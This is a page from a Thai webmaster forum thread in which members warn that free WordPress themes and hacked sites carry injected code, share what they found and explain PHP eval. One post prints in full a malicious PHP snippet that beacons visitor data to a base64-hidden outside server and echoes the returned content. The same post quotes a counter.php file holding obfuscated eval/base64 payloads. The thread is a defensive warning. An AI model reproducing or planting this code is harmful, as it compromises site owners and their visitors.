ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comพัฒนาเว็บไซต์CMS & Free Scriptฝากเตื่อนเพื่อนๆ ก่อนโดน hack
หน้า: 1 [2] 3   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: ฝากเตื่อนเพื่อนๆ ก่อนโดน hack  (อ่าน 4804 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
thaigoodskin
สมุนแก๊งเสียว
*

พลังน้ำใจ: 123
ออฟไลน์ ออฟไลน์

กระทู้: 690



ดูรายละเอียด เว็บไซต์
« ตอบ #20 เมื่อ: 25 กุมภาพันธ์ 2013, 14:23:17 »

ธีมฟรี มักมีของแถมอันตราย ติดมาด้วยเสมอ

โดยเฉพาะอย่างยิ่ง พวกธีม พรีเมี่ยม แล้วเอามาแจกฟรี ตามเว็บเมืองนอกนี่แหละ ตัวดีเลย  wanwan004
บันทึกการเข้า

be-bb
ก๊วนเสียว
*

พลังน้ำใจ: 27
ออฟไลน์ ออฟไลน์

กระทู้: 458



ดูรายละเอียด เว็บไซต์
« ตอบ #21 เมื่อ: 25 กุมภาพันธ์ 2013, 14:47:34 »

เจอแบบนี้ รู้สึกปวดใจเลยครับ wanwan015
บันทึกการเข้า

jit_tiger
ก๊วนเสียว
*

พลังน้ำใจ: 17
ออฟไลน์ ออฟไลน์

กระทู้: 280



ดูรายละเอียด เว็บไซต์
« ตอบ #22 เมื่อ: 25 กุมภาพันธ์ 2013, 14:53:25 »

ง่ะ น่ากลัว  wanwan009
บันทึกการเข้า

backstep
คนรักเสียว
*

พลังน้ำใจ: 23
ออฟไลน์ ออฟไลน์

กระทู้: 133



ดูรายละเอียด
« ตอบ #23 เมื่อ: 25 กุมภาพันธ์ 2013, 21:34:18 »

โหลดของฟรีมาบ่อยเจอแบบนี้ก็ไม่ไหวแหะ  Shocked
บันทึกการเข้า

makoto
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 152
ออฟไลน์ ออฟไลน์

กระทู้: 1,443



ดูรายละเอียด เว็บไซต์
« ตอบ #24 เมื่อ: 16 มีนาคม 2013, 14:00:39 »

เพิ่มเติม ใน folder wp-admin ไฟล์ index ด้วยนะครับ โดน

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
บลา...


ถ้าลบไม่หมดมันก็จะมาเรื่อยๆ ถ้ามีเวลาก็ควร re-install บ่อยๆ

ส่วน wp-app.php นี่ไม่น่าจะใช่นะครับ มันเป็นไฟล์ระบบตั้งแต่ 3.4 ลงไป
« แก้ไขครั้งสุดท้าย: 16 มีนาคม 2013, 14:11:02 โดย makoto » บันทึกการเข้า

iak1
บุคคลทั่วไป
« ตอบ #25 เมื่อ: 16 มีนาคม 2013, 14:19:15 »

เช็ค log แล้วหาที่มาของ เจ้า counter.php โลด





บันทึกการเข้า
MayaKitajima
ก๊วนเสียว
*

พลังน้ำใจ: 32
ออฟไลน์ ออฟไลน์

กระทู้: 350



ดูรายละเอียด
« ตอบ #26 เมื่อ: 16 มีนาคม 2013, 14:30:41 »

กำ มีหลายแบบจัง เคยเจอแฮ็ค ก่อนจะโดน stat โชว์ว่ามีคนมาเข้า url นี้แต่ เป็น not found

แล้วดู url ที่มันหาแต่ละอัน ลงท้าย ด้วย upload, insert, include อะไรของมันเยอะแยะก็ไม่รู้
ไอ้เราก็เอะใจแล้ว มันมาบ่อยจังฟะ แต่ไม่รู้จะทำยังไง เพราะไม่เก่งเรื่อง security และก็โดนจนได้... เหอๆ พอเข้ามาดู

กำแท้ มีไฟล์ ebay และอะไรต่อมิอะไรมาพรึ่บ มีทั้ง .zip มาเป็น Folders ต้องปิดเว็บล้างบางชั่วคราว  Sad
น่ากลัวตรงมีไฟล์ user ขายของด้วยนี่แร่ะ ระแวงสุดๆ
บันทึกการเข้า
mosmf
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 61
ออฟไลน์ ออฟไลน์

กระทู้: 1,610



ดูรายละเอียด เว็บไซต์
« ตอบ #27 เมื่อ: 16 มีนาคม 2013, 14:39:10 »

เห็นแล้วปวดตับ ใช้ของฟรีต้องระวัง  wanwan044
บันทึกการเข้า

seo18
ก๊วนเสียว
*

พลังน้ำใจ: 16
ออฟไลน์ ออฟไลน์

กระทู้: 351



ดูรายละเอียด
« ตอบ #28 เมื่อ: 16 มีนาคม 2013, 14:54:57 »

โดนเหมือนกัน
บันทึกการเข้า
picasso
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 92
ออฟไลน์ ออฟไลน์

กระทู้: 1,177



ดูรายละเอียด เว็บไซต์
« ตอบ #29 เมื่อ: 16 มีนาคม 2013, 14:55:49 »

ขอบคุณครับ
บันทึกการเข้า
OptimusPrime
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 59
ออฟไลน์ ออฟไลน์

กระทู้: 1,066



ดูรายละเอียด
« ตอบ #30 เมื่อ: 16 มีนาคม 2013, 23:10:33 »

 wanwan035 น่ากลัว


 :wanwan017:เป็นความรู้ครับขอบพระคุณครับ
บันทึกการเข้า

- คิดจะพัก คิดถึงภาระ
jade1209
ก๊วนเสียว
*

พลังน้ำใจ: 10
ออฟไลน์ ออฟไลน์

กระทู้: 353



ดูรายละเอียด
« ตอบ #31 เมื่อ: 16 มีนาคม 2013, 23:45:39 »

โค้ดพวกนี้มันทำอะไรได้หรอครับ มันจะติดมาตอนใช้ theme ฟรีของ wp ใช่ปะ
บันทึกการเข้า
ba5nanas
ก๊วนเสียว
*

พลังน้ำใจ: 29
ออฟไลน์ ออฟไลน์

กระทู้: 292



ดูรายละเอียด
« ตอบ #32 เมื่อ: 17 มีนาคม 2013, 00:07:58 »

โค้ดพวกนี้มันทำอะไรได้หรอครับ มันจะติดมาตอนใช้ theme ฟรีของ wp ใช่ปะ


eval เป็น string กลับไปเป็น PHP ครับ เช่น

echo 'echo "hello world";';

มาใช้ eval('echo "hello world"');

ผลที่จะได้ก็คือ hello world

ยิ่งถ้าใครไม่รู้จัก base64 ไม่คิดจะ echo ออกมาดูนี่ น่ากลัวครับ เพราะบางคนดู base64 แบบ ภาษาอะไรวะ ตูงง แล้วก็ผ่านไป ( สำหรับมือใหม่ไม่เคยโดน )

ส่วนคนที่รู้ เขาก็จะ แปล มาดูว่าเกิดอะไรขึ้น ราวๆนั้น

ยิ่งถ้าคุณเก็บข้อมูลสำคัญๆ ด้วยแล้ว eval เป็นฟังชั่นดาบสองคมนั้นแหล่ะ ช่วย การทำ script ให้ง่ายขึ้น แต่ก็ มาช่วยโดน ดาบแทงตัวเองให้ตายง่ายขึ้น

ปล eval มันยังมีความลับอีกเยอะ

http://php.net/manual/en/function.eval.php

ซึ่งผมเองก็บอกไม่หมด ที่ผมบอก นั้นแค่ ขี้เล็บ

และการบอกคุณสัมบัติมากๆ ก็เหมือนดาบสองคมอีกเช่นกัน เป็น functions ที่อันตราย ก็พอ
« แก้ไขครั้งสุดท้าย: 17 มีนาคม 2013, 00:20:33 โดย ba5nanas » บันทึกการเข้า

Wordpress Developer High End

http://www.ba5nanas.com
jade1209
ก๊วนเสียว
*

พลังน้ำใจ: 10
ออฟไลน์ ออฟไลน์

กระทู้: 353



ดูรายละเอียด
« ตอบ #33 เมื่อ: 17 มีนาคม 2013, 07:25:48 »

คือมันทำให้ bot อ่าน string เป็น PHP หรอครับ ผมเข้าใจถูกไหม Huh?

ขอถามเป็นความรู้อีกอย่างนะครับ ถ้าเราเจอโค้ดแบบนี้ในธีม เราแค่ลบธีมมันจะจบไหมครับ รึว่าเป็นเหมือนไวรัสอ่า Lips Sealed
« แก้ไขครั้งสุดท้าย: 17 มีนาคม 2013, 07:27:28 โดย jade1209 » บันทึกการเข้า
Pinnspurs
Newbie
*

พลังน้ำใจ: 0
ออฟไลน์ ออฟไลน์

กระทู้: 64



ดูรายละเอียด
« ตอบ #34 เมื่อ: 17 มีนาคม 2013, 18:10:32 »

สืบเนื่องจาก มีคนไม่หวังดีโจมตีมาต่อเนื่องต่างๆนาๆ และพยายามเรื่อย ไม่รู้จะมาประสงค์ร้ายทำไมผมไปทำอะไรให้ ซึงผมก็ตรวจสอบทุกวัน วันละหลายรอบ ซึ่งเป็นความเคยชินไปแล้วมีไฟล์แปลกปลอมเข้ามาก็ลบตลอด และช่วงนี้พิเศษหน่อย มีมาทุกวัน Tongue เลยอยากจะเอามาเตือนท่านอื่นด้วย

ของผมจะมี File มี code แปลกปลอมเข้ามาใน index.php footer.php ซึงจะมี code ดังนี้ ไม่รู้ว่ามีการทำงานอย่างไร

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

หากเพื่อนๆเจอ code แบบนี้ให้ลบออกด่วนเลย wanwan009
มีอีก ใน root เลย ลบบ่อยมากมันก็พยายามสร้าง ใช้ชื่อเดิม ลบจนเคยชิน


wp-app.php
wp-rdf.php
counter.php

ข้างในเปิดดู บางทีมีชื่อใหม่มาเรื่อยแต่ข้างในเหมือนเดิม

<?php
/**
 * Redirects to the RDF feed
 * This file is deprecated and only exists for backwards compatibility
 *
 * @package WordPress
 */

require( './wp-load.php' );
wp_redirect( get_bloginfo( 'rdf_url' ), 301 );
exit;
?>

และ

ข้างใน wp-app.php ทั้งๆที่ผมไม่เคยสร้างมาก่อน ไม่รุ้มาได้ไง


<?php
/**
 * Atom Publishing Protocol support for WordPress
 *
 * @version 1.0.5-dc
 */

/**
 * WordPress is handling an Atom Publishing Protocol request.
 *
 * @var bool
 */
define('APP_REQUEST', true);

/** Set up WordPress environment */
require_once('./wp-load.php');

/** Atom Publishing Protocol Class */
require_once(ABSPATH . WPINC . '/atomlib.php');

/** Atom Server **/
require_once(ABSPATH . WPINC . '/class-wp-atom-server.php');

/** Admin Image API for metadata updating */
require_once(ABSPATH . '/wp-admin/includes/image.php');

$_SERVER['PATH_INFO'] = preg_replace( '/.*\/wp-app\.php/', '', $_SERVER['REQUEST_URI'] );

// Allow for a plugin to insert a different class to handle requests.
$wp_atom_server_class = apply_filters('wp_atom_server_class', 'wp_atom_server');
$wp_atom_server = new $wp_atom_server_class;

// Handle the request
$wp_atom_server->handle_request();

exit;

/**
 * Writes logging info to a file.
 *
 * @since 2.2.0
 * @deprecated 3.4.0
 * @deprecated Use error_log()
 * @link http://www.php.net/manual/en/function.error-log.php
 *
 * @param string $label Type of logging
 * @param string $msg Information describing logging reason.
 */
function log_app( $label, $msg ) {
   _deprecated_function( __FUNCTION__, '3.4', 'error_log()' );
   if ( ! empty( $GLOBALS['app_logging'] ) )
      error_log( $label . ' - ' . $msg );
}

ข้างใน counter.php  ใครแปลได้ก็เอามาแฉหน่อยครับ wanwan020

<?php
//Counter V.2.35
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eF6lUsFqwkAU/JUeCqtQiiS1ECQHe0ikCJJt0exKCdlNFNKIYkBIvl7nJYVqnicPmbfsvDczu5vncL74mM6/1iJJ000ifvzp8ZjWA5NW+ftbkuV2n+UDYcXTq3AlsAZkoVcZl1YlkPitD/TF8OV22pW1vXwM0+qSJt/xx1hyYzXuqxNDcwDOH6nueiPRA6nIk59Xu6DR4L/VKHYoYakc71dHPnN/WfyJlkqvxqiFceg8Zf8+sX3prlD1CjgugKbz6E/80+46JaMLzWs9rkvByl3WBjXwDmZHP8eo76rQFXgN5YzlCdXOIubsYKi71Wx0jIU82RkqN9Fpgy5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?><? eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl8liGQT8ELMVQmhCG60kmizMdS0FBnPS3RXVrclCX33rrE3vZmPOf3zTylZNlDOZgDlQqfLuw4bWwi4LpAXRa/J6YhJYrs4iJChaQaqOK+aAhnoCjXniinQXCq2PVORd4UAxawWvB3HUsoqhR5KEHTM+aDiQ5rgLSaYTLoE78MIJ7bjqMLU98KjOorAI2bm8K+dlfep5dep61/TVX57j/1b7m5NiAMT3vbybD0Nu1VgnmPiTTzIzK2/lcQz7TYK/2/MZa+8VgUbxt485y1QxqAtxvRh8M/AvJRN08FQTxqHEz5GyYm8jFtZXWSXsd5wflGfhJqhzbTlWhSDFGymw4dOP9c/v836bFU='))); ?><? eval(gzuncompress(base64_decode('eF6FlG1rgzAQgP+KhWINK8Mk1rZIYN1wZeDaYXVfRMRtuhXKCn3Zl+J/30VTNTSQT4bkubtw98RtaQ22x2NxsoZ5Xv5lNkKX793+I98ZYsMTX3bYn3+/LPsOI7GF2XAZrB8XwSYZZRCdjdLETq1htvHDdz9MYMuyUXrFCVvFQSBiKeOnkGpbWtZtGgxp6vvgMecIQowZZb47Fsg0FTyRearjqcw7Ot6R+YmOn8i8q+NdmZ/q+KnMz3T8TObnOn4u8xi06A1AmjDGKB0004QxXWCewqe+BpiCB5DhdDgXhmkaKsTpEHRppk8VhmFQrHYHhmDc1ysXFgqHuETSJaZQQYTM1CGdR1dwrga5QP3chIve5CZYHcIdkkJIF0Ih5NqTpR/VT4fwhojnQlSNaCWjyKsqaHzTNGIMoNP8rUEbbx4oblUj46c4DNZvURb6URyuonCx2jz74bh76FD+NkHrXpcgenn113HURoLv4uIOe1CkaHUk9Q+gubeTiMIoZbVPBCYsROif1Ucu8orPn734STlepajSSgxVquofilhu0g=='))); ?>


และอีกหลาย file จำไม่ได้ละเจอ file แปลกลบไว้ก่อน แนะนำให้ท่านๆ หมั่นตรวจสอบดู  file แปลกปลอมด้วยนะครับ ก่อนที่จะมานั่งเสียอารมณ์+เสียใจทีหลัง wanwan002





คือถ้าเจอโค๊ดตามนี้ ให้รีบลบ หรือยังไงครับ ผมมือใหม่ อ่านแล้วงง มาก  Tongue Tongue
« แก้ไขครั้งสุดท้าย: 17 มีนาคม 2013, 18:10:56 โดย Pinnspurs » บันทึกการเข้า
moneyexpobusiness
ก๊วนเสียว
*

พลังน้ำใจ: 9
ออฟไลน์ ออฟไลน์

กระทู้: 220



ดูรายละเอียด เว็บไซต์
« ตอบ #35 เมื่อ: 17 มีนาคม 2013, 18:16:28 »

น่ากลัวแฮะ ลองไปตรวจดูบ้างดีกว่า
บันทึกการเข้า

jade1209
ก๊วนเสียว
*

พลังน้ำใจ: 10
ออฟไลน์ ออฟไลน์

กระทู้: 353



ดูรายละเอียด
« ตอบ #36 เมื่อ: 17 มีนาคม 2013, 18:30:51 »

คือถ้าเจอโค๊ดตามนี้ ให้รีบลบ หรือยังไงครับ ผมมือใหม่ อ่านแล้วงง มาก  Tongue Tongue

ตามนั้นครับ ไปอ่านจาก basic-hack.blogspot.com มา ปกติพวก hacker มันจะหาช่องโหว่ของระบบแล้วก็แทรกโค้ดพวกนี้มา เราต้องคอยตรวจสอบเองครับ เท่าที่ผมรู้นะ Tongue
บันทึกการเข้า
XauzeR
ก๊วนเสียว
*

พลังน้ำใจ: 23
ออฟไลน์ ออฟไลน์

กระทู้: 461



ดูรายละเอียด
« ตอบ #37 เมื่อ: 17 มีนาคม 2013, 18:57:26 »

โมเองปลอดภัยที่สุด

 wanwan019 wanwan019 wanwan019
บันทึกการเข้า
Kalin
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 96
ออฟไลน์ ออฟไลน์

กระทู้: 1,785



ดูรายละเอียด เว็บไซต์
« ตอบ #38 เมื่อ: 17 มีนาคม 2013, 19:11:58 »

ของดีและฟรีมีน้อยครับ  wanwan031
« แก้ไขครั้งสุดท้าย: 17 มีนาคม 2013, 19:12:23 โดย Kalin » บันทึกการเข้า

Comman
Newbie
*

พลังน้ำใจ: 2
ออฟไลน์ ออฟไลน์

กระทู้: 20



ดูรายละเอียด
« ตอบ #39 เมื่อ: 17 มีนาคม 2013, 19:15:06 »

 wanwan044 ของฟรีแต่ไ่ม่ปลอดภัย ใครไม่รู้ก็เสร็จ ขอบคุณสำหรับข้อมูลดีๆครับ
บันทึกการเข้า
หน้า: 1 [2] 3   ขึ้นบน
พิมพ์